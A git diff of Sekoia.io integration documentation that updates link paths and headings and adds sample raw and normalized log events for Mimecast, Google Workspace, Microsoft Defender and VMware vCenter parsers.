diff --git a/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md b/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md index f38e42f531..c7511a24b0 100644 --- a/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md +++ b/_shared_content/operations_center/integrations/generated/00bbde4f-cb17-4c3f-9f5e-a585fc7c8fc0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "gke_container_runtime2.json" diff --git a/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md b/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md index 4361e474c8..0cb5b1af08 100644 --- a/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md +++ b/_shared_content/operations_center/integrations/generated/021e9def-5a55-4369-941e-af269b45bef1.md @@ -20,7 +20,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "auth-action-changed-login-id-to.json" diff --git a/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md b/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md index 26841e95eb..2ab2186c72 100644 --- a/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md +++ b/_shared_content/operations_center/integrations/generated/02a74ceb-a9b0-467c-97d1-588319e39d71.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_aaatm.json" diff --git a/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md b/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md index 95fa39f117..72afcdfa8d 100644 --- a/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md +++ b/_shared_content/operations_center/integrations/generated/033cd098-b21b-4c9b-85c4-c8174c307e48.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "amsi_detected_harmful_content.json" diff --git a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md index c752f872de..086d07efa1 100644 --- a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md +++ b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -23,10 +23,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_journal.json" @@ -216,7 +215,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -245,3 +244,6 @@ The following table lists the fields that are extracted, normalized under the EC |`mimecast.siem.virus_found` | `keyword` | The name of the virus found on the email, if applicable. | |`source.ip` | `ip` | IP address of the source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/Mimecast/mimecast-email-security). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md new file mode 100644 index 0000000000..904e4b9374 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/041e915e-2fb6-4604-9b24-902c9daa2d3c_sample.md @@ -0,0 +1,114 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "test_journal" + + + ```json + { + "aggregateId": "vC80NNxvOWKkBPnzSs04FA_1715699686", + "processingId": "PGZfGuxEAu_kE-nGy1sjThBr5EYbm1ZcDKg-vXbRHLA_1715699686", + "accountId": "CDE22A102", + "timestamp": 1715699697146, + "senderEnvelope": "newsletter@stub.com", + "recipients": "neo@gmail.fr", + "direction": "Inbound", + "type": "journal", + "subtype": null, + "_offset": 105760, + "_partition": 137 + } + ``` + + + +=== "test_process" + + + ```json + { + "aggregateId": "J5JwSy0HNvG7AvCg1sgDvQ_1715708284", + "processingId": "hP5f7mBanAVkWJWfh4vYvca3zOi9I3jROBmH3Z_Kysk_1715708284", + "accountId": "CDE22A102", + "action": "Hld", + "timestamp": 1715708287466, + "senderEnvelope": "john.doe015@gmail.com", + "messageId": "", + "subject": "Moderate", + "holdReason": "Spm", + "totalSizeAttachments": "0", + "numberAttachments": "0", + "attachments": null, + "emailSize": "3466", + "type": "process", + "subtype": "Hld", + "_offset": 105825, + "_partition": 137 + } + ``` + + + +=== "test_process_with_attachment" + + + ```json + { + "processingId": "processingId", + "aggregateId": "aggregateId", + "numberAttachments": "2", + "attachments": "tpsreport.doc", + "subject": "siem_process - email subject line", + "senderEnvelope": "auser@mimecast.com", + "messageId": "messageId", + "eventType": "process", + "accountId": "C0A0", + "action": "Allow", + "holdReason": null, + "subType": "Allow", + "totalSizeAttachments": "642", + "timestamp": 1689685338609, + "emailSize": "56422" + } + ``` + + + +=== "test_receipt" + + + ```json + { + "aggregateId": "J5JwSy0HNvG7AvCg1sgDvQ_1715708284", + "processingId": "hP5f7mBanAVkWJWfh4vYvca3zOi9I3jROBmH3Z_Kysk_1715708284", + "accountId": "CDE22A102", + "timestamp": 1715708286579, + "action": "Acc", + "senderEnvelope": "john.doe@gmail.com", + "messageId": "", + "subject": "Moderate", + "recipients": "admin@mcfr2.pro", + "senderIp": "209.123.123.123", + "rejectionType": null, + "rejectionCode": null, + "direction": "Inbound", + "numberAttachments": "0", + "senderHeader": "john.doe@gmail.com", + "rejectionInfo": null, + "tlsVersion": "TLSv1.3", + "tlsCipher": "TLS_AES_256_GCM_SHA384", + "spamInfo": "[]", + "spamProcessingDetail": "{\"spf\":{\"allow\":true,\"info\":\"ALLOW\"},\"dkim\":{\"allow\":true,\"info\":\"ALLOW\"},\"dmarc\":{\"allow\":true,\"info\":\"ALLOW\"}}", + "virusFound": null, + "type": "receipt", + "subtype": "Acc", + "_offset": 105826, + "_partition": 137 + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md index 0df163a43e..ad6946d884 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd.md @@ -18,14 +18,14 @@ In details, the following table denotes the type of events produced by this inte | ---- | ------ | | Kind | `` | | Category | `authentication`, `configuration`, `file`, `iam`, `session` | -| Type | `access`, `admin`, `connection` | +| Type | `access`, `admin`, `change`, `connection` | ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_admin_sample1.json" @@ -727,6 +727,65 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_suspend_user.json" + + ```json + + { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-07-09T14:05:42.528Z\",\"uniqueQualifier\":\"0123456789101112131\",\"applicationName\":\"admin\",\"customerId\":\"C03foh000\"},\"etag\":\"BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL_9Z5X0\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.fr\",\"profileId\":\"102788027662650927386\"},\"ipAddress\":\"1.2.3.4\",\"events\":[{\"type\":\"USER_SETTINGS\",\"name\":\"SUSPEND_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"jdoe@test.fr\"}]}]}", + "event": { + "action": "SUSPEND_USER", + "category": [ + "configuration" + ], + "dataset": "admin#reports#activity", + "type": [ + "change" + ] + }, + "@timestamp": "2024-07-09T14:05:42.528000Z", + "cloud": { + "account": { + "id": "C03foh000" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.fr" + }, + "parameters": { + "name": "USER_EMAIL", + "value": "jdoe@test.fr" + } + } + }, + "network": { + "application": "admin" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "domain": "test.fr", + "email": "john.doe@test.fr", + "id": "102788027662650927386", + "name": "john.doe" + } + } + + ``` + + === "test_target_user.json" ```json @@ -955,6 +1014,8 @@ The following table lists the fields that are extracted, normalized under the EC |`google.report.chat.message.id` | `keyword` | Message id | |`google.report.chat.room.name` | `keyword` | Room name | |`google.report.meet.code` | `keyword` | Meet code | +|`google.report.parameters.name` | `keyword` | Name of the item associated with the activity | +|`google.report.parameters.value` | `keyword` | Value of the item associated with the activity | |`google.report.parameters.visibility` | `keyword` | Visibility of the Drive item associated with the activity | |`google.report.token.app_name` | `keyword` | Token authorization application name | |`google.report.token.type` | `keyword` | Token type | diff --git a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md index e441bc00a6..87d34bd726 100644 --- a/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md +++ b/_shared_content/operations_center/integrations/generated/04d36706-ee4a-419b-906d-f92f3a46bcdd_sample.md @@ -968,6 +968,42 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_suspend_user" + + + ```json + { + "kind": "admin#reports#activity", + "id": { + "time": "2024-07-09T14:05:42.528Z", + "uniqueQualifier": "0123456789101112131", + "applicationName": "admin", + "customerId": "C03foh000" + }, + "etag": "BvGfkzKoKVD0NM7VdXdzkXDD-nHLkyMjheL_9Z5X0", + "actor": { + "callerType": "USER", + "email": "john.doe@test.fr", + "profileId": "102788027662650927386" + }, + "ipAddress": "1.2.3.4", + "events": [ + { + "type": "USER_SETTINGS", + "name": "SUSPEND_USER", + "parameters": [ + { + "name": "USER_EMAIL", + "value": "jdoe@test.fr" + } + ] + } + ] + } + ``` + + + === "test_target_user" diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md index 27b255f1df..51c4448860 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f.md @@ -43,7 +43,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_alert_evidence.json" @@ -1087,6 +1087,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "2b684979d6174bad69d895c7d8a852e7b206b95f", "4d5b7b6c06159d6b967f2c2c73f10145" ], + "hosts": [ + "www.example.org" + ], "ip": [ "1.2.3.4", "5.6.7.8" @@ -1096,6 +1099,12 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "address": "1.2.3.4", "ip": "1.2.3.4", "port": 59985 + }, + "url": { + "domain": "www.example.org", + "registered_domain": "example.org", + "subdomain": "www", + "top_level_domain": "org" } } @@ -1153,6 +1162,47 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_device_process_created.json" + + ```json + + { + "message": "{\"time\": \"2024-08-01T18:30:14.6841985Z\", \"tenantId\": \"14c90b3a-ee5f-43fa-b406-0baa32d561ca\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceEvents\", \"_TimeReceivedBySvc\": \"2024-08-01T18:28:43.4289906Z\", \"properties\": {\"DeviceId\": \"1111111111111111111111111111111111111111\", \"DeviceName\": \"desktop01.example.org\", \"ReportId\": 4772, \"InitiatingProcessId\": null, \"InitiatingProcessCreationTime\": null, \"InitiatingProcessCommandLine\": null, \"InitiatingProcessParentFileName\": null, \"InitiatingProcessParentId\": null, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessSHA1\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": null, \"InitiatingProcessFolderPath\": null, \"InitiatingProcessAccountName\": \"syst\\u00e8me\", \"InitiatingProcessAccountDomain\": \"autorite nt\", \"SHA1\": null, \"MD5\": null, \"FileName\": null, \"FolderPath\": null, \"AccountName\": null, \"AccountDomain\": null, \"AdditionalFields\": \"{\\\"InitiatingProcess\\\":{},\\\"ClientMachine\\\":\\\"l-195hnx3\\\",\\\"IsRemoteMachine\\\":false}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": \"\", \"InitiatingProcessSHA256\": null, \"SHA256\": null, \"RemoteUrl\": null, \"ProcessCreationTime\": null, \"ProcessTokenElevation\": null, \"ActionType\": \"ProcessCreatedUsingWmiQuery\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": null, \"AccountSid\": null, \"RemoteDeviceName\": \"\", \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-08-01T18:27:07.2126839Z\", \"MachineGroup\": null}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-01T18:27:07.212683Z", + "action": { + "type": "ProcessCreatedUsingWmiQuery" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "desktop01.example.org" + }, + "microsoft": { + "defender": { + "report": { + "id": "4772" + } + } + }, + "process": { + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" + } + } + } + + ``` + + === "test_device_process_events.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md index 96227c28f4..16f3caed07 100644 --- a/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md +++ b/_shared_content/operations_center/integrations/generated/05e6f36d-cee0-4f06-b575-9e43af779f9f_sample.md @@ -827,6 +827,89 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_device_process_created" + + + ```json + { + "time": "2024-08-01T18:30:14.6841985Z", + "tenantId": "14c90b3a-ee5f-43fa-b406-0baa32d561ca", + "operationName": "Publish", + "category": "AdvancedHunting-DeviceEvents", + "_TimeReceivedBySvc": "2024-08-01T18:28:43.4289906Z", + "properties": { + "DeviceId": "1111111111111111111111111111111111111111", + "DeviceName": "desktop01.example.org", + "ReportId": 4772, + "InitiatingProcessId": null, + "InitiatingProcessCreationTime": null, + "InitiatingProcessCommandLine": null, + "InitiatingProcessParentFileName": null, + "InitiatingProcessParentId": null, + "InitiatingProcessParentCreationTime": null, + "InitiatingProcessSHA1": null, + "InitiatingProcessMD5": null, + "InitiatingProcessFileName": null, + "InitiatingProcessFolderPath": null, + "InitiatingProcessAccountName": "syst\u00e8me", + "InitiatingProcessAccountDomain": "autorite nt", + "SHA1": null, + "MD5": null, + "FileName": null, + "FolderPath": null, + "AccountName": null, + "AccountDomain": null, + "AdditionalFields": "{\"InitiatingProcess\":{},\"ClientMachine\":\"l-195hnx3\",\"IsRemoteMachine\":false}", + "InitiatingProcessAccountSid": null, + "AppGuardContainerId": "", + "InitiatingProcessSHA256": null, + "SHA256": null, + "RemoteUrl": null, + "ProcessCreationTime": null, + "ProcessTokenElevation": null, + "ActionType": "ProcessCreatedUsingWmiQuery", + "FileOriginUrl": null, + "FileOriginIP": null, + "InitiatingProcessLogonId": null, + "AccountSid": null, + "RemoteDeviceName": "", + "RegistryKey": null, + "RegistryValueName": null, + "RegistryValueData": null, + "LogonId": null, + "LocalIP": null, + "LocalPort": null, + "RemoteIP": null, + "RemotePort": null, + "ProcessId": null, + "ProcessCommandLine": null, + "InitiatingProcessAccountUpn": null, + "InitiatingProcessAccountObjectId": null, + "FileSize": null, + "InitiatingProcessFileSize": null, + "InitiatingProcessVersionInfoCompanyName": null, + "InitiatingProcessVersionInfoProductName": null, + "InitiatingProcessVersionInfoProductVersion": null, + "InitiatingProcessVersionInfoInternalFileName": null, + "InitiatingProcessVersionInfoOriginalFileName": null, + "InitiatingProcessVersionInfoFileDescription": null, + "InitiatingProcessSessionId": null, + "IsInitiatingProcessRemoteSession": false, + "InitiatingProcessRemoteSessionDeviceName": null, + "InitiatingProcessRemoteSessionIP": null, + "CreatedProcessSessionId": null, + "IsProcessRemoteSession": false, + "ProcessRemoteSessionDeviceName": null, + "ProcessRemoteSessionIP": null, + "Timestamp": "2024-08-01T18:27:07.2126839Z", + "MachineGroup": null + }, + "Tenant": "DefaultTenant" + } + ``` + + + === "test_device_process_events" diff --git a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md index 7d5c73a032..c5baf2fdfa 100644 --- a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md +++ b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4.md @@ -21,7 +21,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "connections_logs.json" @@ -268,6 +268,93 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "other_tests_example1_type_7.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T23:41:05.366919Z] [vim.event.ScheduledTaskCompletedEvent] [info] [com.vmware.vcIntegrity] [] [22222222] [Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully]", + "event": { + "category": [ + "network" + ], + "code": "vim.event.ScheduledTaskCompletedEvent", + "reason": "Task VMware vSphere Update Manager Check Notification on Datacenters in datacenter completed successfully", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-06-18T23:41:05.366919Z", + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "user": [ + "com.vmware.vcIntegrity" + ] + }, + "source": { + "user": { + "name": "com.vmware.vcIntegrity" + } + }, + "vmware_vcenter": { + "event_id": "11111111" + } + } + + ``` + + +=== "other_tests_example2_type_7.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T23:28:06.155764Z] [vim.event.EventEx] [info] [System] [Datacenter] [11111111] [Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green]", + "event": { + "category": [ + "authentication" + ], + "code": "vim.event.EventEx", + "reason": "Hardware Sensor Status: Processor Green, Memory Green, Fan Green, Voltage Green, Temperature Green, Power Green, System Board Green, Battery Green, Storage Green, Other Green", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-18T23:28:06.155764Z", + "host": { + "name": "Datacenter" + }, + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "user": [ + "System" + ] + }, + "source": { + "user": { + "name": "System" + } + }, + "vmware_vcenter": { + "event_id": "11111111" + } + } + + ``` + + === "others_events.json" ```json @@ -372,7 +459,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ```json { - "message": "2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)", + "message": "2023-05-11T10:22:26.181+0000: 23134193.224: [GC (Allocation Failure)]", "event": { "category": [ "network" @@ -392,30 +479,6 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` -=== "others_events_type4.json" - - ```json - - { - "message": "Desired survivor size 1572864 bytes, new threshold 1 (max 15)", - "event": { - "category": [ - "network" - ], - "reason": "Desired survivor size 1572864 bytes, new threshold 1 (max 15)", - "type": [ - "connection" - ] - }, - "observer": { - "product": "VCenter", - "vendor": "VMWare" - } - } - - ``` - - === "others_events_type5.json" ```json @@ -544,7 +607,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "WeakReference, 0 refs, 0.0000061 secs]", + "reason": "WeakReference, 0 refs, 0.0000061 secs", "type": [ "connection" ] @@ -569,7 +632,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "FinalReference, 150 refs, 0.0004388 secs]", + "reason": "FinalReference, 150 refs, 0.0004388 secs", "type": [ "connection" ] @@ -594,7 +657,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "PhantomReference, 0 refs, 0 refs, 0.0000065 secs]", + "reason": "PhantomReference, 0 refs, 0 refs, 0.0000065 secs", "type": [ "connection" ] @@ -619,7 +682,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "JNI Weak Reference, 0.0000149 secs]", + "reason": "JNI Weak Reference, 0.0000149 secs", "type": [ "connection" ] @@ -644,7 +707,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "category": [ "network" ], - "reason": "SoftReference, 0 refs, 0.0000457 secs]", + "reason": "SoftReference, 0 refs, 0.0000457 secs", "type": [ "connection" ] @@ -843,14 +906,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "127.0.0.1" + ], + "user": [ + "root" ] }, + "user": { + "name": "root" + }, "user_agent": { "device": { "name": "Other" }, "name": "Other", - "original": "pyvmomi Python/3.8.13 (VMkernel; 7.0.3; x86_64))", + "original": "pyvmomi Python/3.8.13 (VMkernel; 7.0.3; x86_64)", "os": { "name": "Other" } @@ -865,6 +934,64 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "session_logs_type3_wo_hostname.json" + + ```json + + { + "message": "Event [11111111] [1-1] [2024-06-18T22:45:08.003776Z] [vim.event.UserLogoutSessionEvent] [info] [root\\example] [] [22222222] [User root\\example@127.0.0.1 logged out (login time: Tuesday, 18 June, 2024 10:45:07 PM, number of API invocations: 2, user agent: VMware vim-java 1.0)]", + "event": { + "category": [ + "authentication" + ], + "code": "vim.event.UserLogoutSessionEvent", + "type": [ + "end" + ] + }, + "@timestamp": "2024-06-18T22:45:08.003776Z", + "host": { + "ip": "127.0.0.1" + }, + "log": { + "level": "info" + }, + "observer": { + "product": "VCenter", + "vendor": "VMWare" + }, + "related": { + "ip": [ + "127.0.0.1" + ], + "user": [ + "example" + ] + }, + "user": { + "domain": "root", + "name": "example" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "VMware vim-java 1.0", + "os": { + "name": "Other" + } + }, + "vmware_vcenter": { + "api_invocations": "2", + "event_id": "11111111", + "login_time": "Tuesday, 18 June, 2024 10:45:07 PM" + } + } + + ``` + + === "session_logs_type4.json" ```json @@ -1077,6 +1204,7 @@ The following table lists the fields that are extracted, normalized under the EC |`source.user.domain` | `keyword` | Name of the directory the user is a member of. | |`source.user.name` | `keyword` | Short name or login of the user. | |`url.path` | `wildcard` | Path of the request, such as "/search". | +|`user.domain` | `keyword` | Name of the directory the user is a member of. | |`user.name` | `keyword` | Short name or login of the user. | |`user_agent.original` | `keyword` | Unparsed user_agent string. | |`vmware_vcenter.api_invocations` | `keyword` | The number of API invocations made | diff --git a/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md b/_shared_content/operations_center/integrations/generated/0642b03a-9d4a-4c88-a5e2-4597e366b8c4_sample.md index 4e8a92a89f..84c99f7e32 100644 --- 